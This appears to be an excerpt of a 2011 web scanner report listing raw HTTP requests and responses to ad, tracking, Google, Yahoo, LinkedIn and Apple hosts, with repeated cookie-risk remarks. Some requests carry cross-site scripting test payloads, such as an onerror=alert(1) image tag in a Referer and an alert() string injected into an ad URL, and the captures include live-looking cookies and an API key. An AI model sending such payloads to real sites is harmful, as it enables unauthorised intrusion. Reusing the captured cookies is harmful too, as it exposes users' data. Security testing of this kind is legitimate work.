HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com Cache-Control: no-cache, private, proxy-revalidate, max-age=86400 Pragma: no-cache Content-Type: image/gif Content-Length: 43 Date: Thu, 03 Feb 2011 19:52:09 GMT Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1 Host: l0.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=200&g=512 HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g
Response
HTTP/1.1 200 OK Connection: close X-Powered-By: PHP/5.2.8 P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA Content-Type: application/x-javascript Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Date: Thu, 03 Feb 2011 20:52:27 GMT Server: HTTP server Content-Length: 92
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1 Accept: */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?vp=jpc403475513 HTTP/1.1 Host: mobile.jackpotcity.com Proxy-Connection: keep-alive Referer: http://www.jackpotcity.com/online-casino/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ If-None-Match: "J18332:E0-293462370-1296766279068"
Response
HTTP/1.1 200 OK Connection: close Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Content-Type: application/x-javascript ETag: "J18338:E0-293462370-1296766279068" Cache-Control: private, no-transform, max-age=600 Expires: Fri, 04 Feb 2011 02:33:00 GMT Content-Length: 159 Date: Fri, 04 Feb 2011 02:23:00 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1 Host: qa.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/ Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:33:42 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: qooxdoo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /schhp HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://scholar.google.com/schhp? ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search;_ylc=X3oDMTE4aHZtZGtyBF9TAzc4NDcxODMyNQRrA2FiYyBkZXZlbG9wbWVudARzZWMDdGl0bGU-?p=abc+development&sem=google/x22 HTTP/1.1 Host: shopping.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:33:45 GMT Set-Cookie: B=eso7aa56km499&b=3&s=7m; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: SHOPSEMAFFILIATE=sem=google/x22; expires=Thu, 03-Feb-2011 21:03:45 GMT; path=/; domain=.shopping.yahoo.com Cache-Control: private Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 105590
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us-hed/findyourschool HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="en-us en us" lang="en-US"> <head> <meta name="viewport" content="width=1024" />
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us-hed/go/home HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us_smb_78313 HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; 